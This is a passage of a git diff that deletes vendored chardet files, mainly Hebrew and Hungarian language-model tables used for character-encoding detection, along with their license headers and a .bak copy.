-0,0,0,0,0,0,0,0,2,0,1,1,1,0,1,0,0,0,1,1,0,1,1,0,0,0,0,0,1,1,0,0, -0,1,1,1,2,1,2,2,2,0,2,0,2,0,1,1,2,1,1,1,1,2,1,0,1,1,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,1,0,0,0,0,0,1,0,1,2,2,0,1,0,0,1,1,2,2,1,2,0,2,0,0,0,1,2,0,1, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,2,0,2,1,2,0,2,0,0,1,1,1,1,1,1,0,1,0,0,0,1,0,0,1, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,1,0,0,0,0,0,1,0,2,1,1,0,1,0,0,1,1,1,2,2,0,0,1,0,0,0,1,0,0,1, -1,1,2,1,0,1,1,1,0,1,0,1,1,1,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,2,1, -0,2,0,1,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,1,0,0,1,0,1,1,1,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,1,0,0,0,1,1,0,1, -2,0,1,0,1,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,1,1,1,0,1,0,0,1,1,2,1,1,2,0,1,0,0,0,1,1,0,1, -1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,0,0,2,1,1,2,0,2,0,0,0,1,1,0,1, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,2,1,1,0,1,0,0,2,2,1,2,1,1,0,1,0,0,0,1,1,0,1, -2,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,2,2,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,1,0,1, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,2,2,0,0,0,0,2,1,1,1,0,2,1,1,0,0,0,2,1,0,1, -1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,1,1,0,2,1,1,0,1,0,0,0,1,1,0,1, -2,2,1,1,1,0,1,1,0,1,1,0,1,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,2,1,1,0,1,0,0,1,1,0,1,2,1,0,2,0,0,0,1,1,0,1, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0, -0,1,0,0,2,0,2,1,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,1,1,1,0,1,0,0,1,0,0,0,1,0,0,1, -1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,0,0,0,0,0,1,0,1,1,0,0,1,0,0,2,1,1,1,1,1,0,1,0,0,0,0,1,0,1, -0,1,1,1,2,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,2,1,0,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,0,0, -) - -Win1255HebrewModel = { \ - 'charToOrderMap': win1255_CharToOrderMap, - 'precedenceMatrix': HebrewLangModel, - 'mTypicalPositiveRatio': 0.984004, - 'keepEnglishLetter': False, - 'charsetName': "windows-1255" -} diff --git a/chardet/chardet/langhebrewmodel.py.bak b/chardet/chardet/langhebrewmodel.py.bak deleted file mode 100644 index a8bcc65..0000000 --- a/chardet/chardet/langhebrewmodel.py.bak +++ /dev/null @@ -1,201 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Simon Montagu -# Portions created by the Initial Developer are Copyright (C) 2005 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# Shoshannah Forbes - original C code (?) -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants - -# 255: Control characters that usually does not exist in any text -# 254: Carriage/Return -# 253: symbol (punctuation) that does not belong to word -# 252: 0 - 9 - -# Windows-1255 language model -# Character Mapping Table: -win1255_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 69, 91, 79, 80, 92, 89, 97, 90, 68,111,112, 82, 73, 95, 85, # 40 - 78,121, 86, 71, 67,102,107, 84,114,103,115,253,253,253,253,253, # 50 -253, 50, 74, 60, 61, 42, 76, 70, 64, 53,105, 93, 56, 65, 54, 49, # 60 - 66,110, 51, 43, 44, 63, 81, 77, 98, 75,108,253,253,253,253,253, # 70 -124,202,203,204,205, 40, 58,206,207,208,209,210,211,212,213,214, -215, 83, 52, 47, 46, 72, 32, 94,216,113,217,109,218,219,220,221, - 34,116,222,118,100,223,224,117,119,104,125,225,226, 87, 99,227, -106,122,123,228, 55,229,230,101,231,232,120,233, 48, 39, 57,234, - 30, 59, 41, 88, 33, 37, 36, 31, 29, 35,235, 62, 28,236,126,237, -238, 38, 45,239,240,241,242,243,127,244,245,246,247,248,249,250, - 9, 8, 20, 16, 3, 2, 24, 14, 22, 1, 25, 15, 4, 11, 6, 23, - 12, 19, 13, 26, 18, 27, 21, 17, 7, 10, 5,251,252,128, 96,253, -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 98.4004% -# first 1024 sequences: 1.5981% -# rest sequences: 0.087% -# negative sequences: 0.0015% -HebrewLangModel = ( \ -0,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,3,2,1,2,0,1,0,0, -3,0,3,1,0,0,1,3,2,0,1,1,2,0,2,2,2,1,1,1,1,2,1,1,1,2,0,0,2,2,0,1, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2, -1,2,1,2,1,2,0,0,2,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2, -1,2,1,3,1,1,0,0,2,0,0,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,0,1,2,2,1,3, -1,2,1,1,2,2,0,0,2,2,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,1,0,1,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,2,2,2,2,3,2, -1,2,1,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,2,3,2,2,3,2,2,2,1,2,2,2,2, -1,2,1,1,2,2,0,1,2,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,0,2,2,2,2,2, -0,2,0,2,2,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,0,2,2,2, -0,2,1,2,2,2,0,0,2,1,0,0,0,0,1,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,2,1,2,3,2,2,2, -1,2,1,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,0, -3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,0,2,0,2, -0,2,1,2,2,2,0,0,1,2,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,2,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,2,2,3,2,1,2,1,1,1, -0,1,1,1,1,1,3,0,1,0,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,0,1,0,0,1,0,0,0,0, -0,0,1,0,0,0,0,0,2,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2, -0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,2,3,3,3,2,1,2,3,3,2,3,3,3,3,2,3,2,1,2,0,2,1,2, -0,2,0,2,2,2,0,0,1,2,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0, -3,3,3,3,3,3,3,3,3,2,3,3,3,1,2,2,3,3,2,3,2,3,2,2,3,1,2,2,0,2,2,2, -0,2,1,2,2,2,0,0,1,2,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,2,2,2,3,3,3,3,1,3,2,2,2, -0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,3,3,2,3,2,2,2,1,2,2,0,2,2,2,2, -0,2,0,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,1,3,2,3,3,2,3,3,2,2,1,2,2,2,2,2,2, -0,2,1,2,1,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,2,3,2,3,3,2,3,3,3,3,2,3,2,3,3,3,3,3,2,2,2,2,2,2,2,1, -0,2,0,1,2,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,2,1,2,3,3,3,3,3,3,3,2,3,2,3,2,1,2,3,0,2,1,2,2, -0,2,1,1,2,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,2,0, -3,3,3,3,3,3,3,3,3,2,3,3,3,3,2,1,3,1,2,2,2,1,2,3,3,1,2,1,2,2,2,2, -0,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,0,2,3,3,3,1,3,3,3,1,2,2,2,2,1,1,2,2,2,2,2,2, -0,2,0,1,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,2,3,3,3,2,2,3,3,3,2,1,2,3,2,3,2,2,2,2,1,2,1,1,1,2,2, -0,2,1,1,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,1,0,0,0,0,0, -1,0,1,0,0,0,0,0,2,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,2,3,3,2,3,1,2,2,2,2,3,2,3,1,1,2,2,1,2,2,1,1,0,2,2,2,2, -0,1,0,1,2,2,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,0,0,1,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,2,0, -0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,1,0,1,0,1,1,0,1,1,0,0,0,1,1,0,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,0,0,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -3,2,2,1,2,2,2,2,2,2,2,1,2,2,1,2,2,1,1,1,1,1,1,1,1,2,1,1,0,3,3,3, -0,3,0,2,2,2,2,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -2,2,2,3,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,1,2,2,2,1,1,1,2,0,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2,2,2,2,0,2,2,0,0,0,0,0,0, -0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,1,0,2,1,0, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0, -0,3,1,1,2,2,2,2,2,1,2,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,0,1,1,1,1,0, -0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,1,1,1,1,2,1,1,2,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0, -0,0,2,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,1,0,0, -2,1,1,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,1,2,1,2,1,1,1,1,0,0,0,0, -0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,2,1,2,2,2,2,2,2,2,2,2,2,1,2,1,2,1,1,2,1,1,1,2,1,2,1,2,0,1,0,1, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,1,2,2,2,1,2,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,2,1,2,1,1,0,1,0,1, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,1,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2, -0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,1,1,1,1,1,1,1,0,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,2,0,1,1,1,0,1,0,0,0,1,1,0,1,1,0,0,0,0,0,1,1,0,0, -0,1,1,1,2,1,2,2,2,0,2,0,2,0,1,1,2,1,1,1,1,2,1,0,1,1,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,1,0,0,0,0,0,1,0,1,2,2,0,1,0,0,1,1,2,2,1,2,0,2,0,0,0,1,2,0,1, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,2,0,2,1,2,0,2,0,0,1,1,1,1,1,1,0,1,0,0,0,1,0,0,1, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,1,0,0,0,0,0,1,0,2,1,1,0,1,0,0,1,1,1,2,2,0,0,1,0,0,0,1,0,0,1, -1,1,2,1,0,1,1,1,0,1,0,1,1,1,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,2,1, -0,2,0,1,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,1,0,0,1,0,1,1,1,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,1,0,0,0,1,1,0,1, -2,0,1,0,1,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,1,1,1,0,1,0,0,1,1,2,1,1,2,0,1,0,0,0,1,1,0,1, -1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,0,0,2,1,1,2,0,2,0,0,0,1,1,0,1, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,2,1,1,0,1,0,0,2,2,1,2,1,1,0,1,0,0,0,1,1,0,1, -2,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,2,2,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,1,0,1, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,2,2,0,0,0,0,2,1,1,1,0,2,1,1,0,0,0,2,1,0,1, -1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,1,1,0,2,1,1,0,1,0,0,0,1,1,0,1, -2,2,1,1,1,0,1,1,0,1,1,0,1,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,2,1,1,0,1,0,0,1,1,0,1,2,1,0,2,0,0,0,1,1,0,1, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0, -0,1,0,0,2,0,2,1,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,1,1,1,0,1,0,0,1,0,0,0,1,0,0,1, -1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,0,0,0,0,0,1,0,1,1,0,0,1,0,0,2,1,1,1,1,1,0,1,0,0,0,0,1,0,1, -0,1,1,1,2,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,2,1,0,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,0,0, -) - -Win1255HebrewModel = { \ - 'charToOrderMap': win1255_CharToOrderMap, - 'precedenceMatrix': HebrewLangModel, - 'mTypicalPositiveRatio': 0.984004, - 'keepEnglishLetter': constants.False, - 'charsetName': "windows-1255" -} diff --git a/chardet/chardet/langhebrewmodel.pyc b/chardet/chardet/langhebrewmodel.pyc deleted file mode 100644 index 369dc9e..0000000 Binary files a/chardet/chardet/langhebrewmodel.pyc and /dev/null differ diff --git a/chardet/chardet/langhungarianmodel.py b/chardet/chardet/langhungarianmodel.py deleted file mode 100644 index a81f5c4..0000000 --- a/chardet/chardet/langhungarianmodel.py +++ /dev/null @@ -1,225 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants - -# 255: Control characters that usually does not exist in any text -# 254: Carriage/Return -# 253: symbol (punctuation) that does not belong to word -# 252: 0 - 9 - -# Character Mapping Table: -Latin2_HungarianCharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 28, 40, 54, 45, 32, 50, 49, 38, 39, 53, 36, 41, 34, 35, 47, - 46, 71, 43, 33, 37, 57, 48, 64, 68, 55, 52,253,253,253,253,253, -253, 2, 18, 26, 17, 1, 27, 12, 20, 9, 22, 7, 6, 13, 4, 8, - 23, 67, 10, 5, 3, 21, 19, 65, 62, 16, 11,253,253,253,253,253, -159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174, -175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190, -191,192,193,194,195,196,197, 75,198,199,200,201,202,203,204,205, - 79,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220, -221, 51, 81,222, 78,223,224,225,226, 44,227,228,229, 61,230,231, -232,233,234, 58,235, 66, 59,236,237,238, 60, 69, 63,239,240,241, - 82, 14, 74,242, 70, 80,243, 72,244, 15, 83, 77, 84, 30, 76, 85, -245,246,247, 25, 73, 42, 24,248,249,250, 31, 56, 29,251,252,253, -) - -win1250HungarianCharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 28, 40, 54, 45, 32, 50, 49, 38, 39, 53, 36, 41, 34, 35, 47, - 46, 72, 43, 33, 37, 57, 48, 64, 68, 55, 52,253,253,253,253,253, -253, 2, 18, 26, 17, 1, 27, 12, 20, 9, 22, 7, 6, 13, 4, 8, - 23, 67, 10, 5, 3, 21, 19, 65, 62, 16, 11,253,253,253,253,253, -161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176, -177,178,179,180, 78,181, 69,182,183,184,185,186,187,188,189,190, -191,192,193,194,195,196,197, 76,198,199,200,201,202,203,204,205, - 81,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220, -221, 51, 83,222, 80,223,224,225,226, 44,227,228,229, 61,230,231, -232,233,234, 58,235, 66, 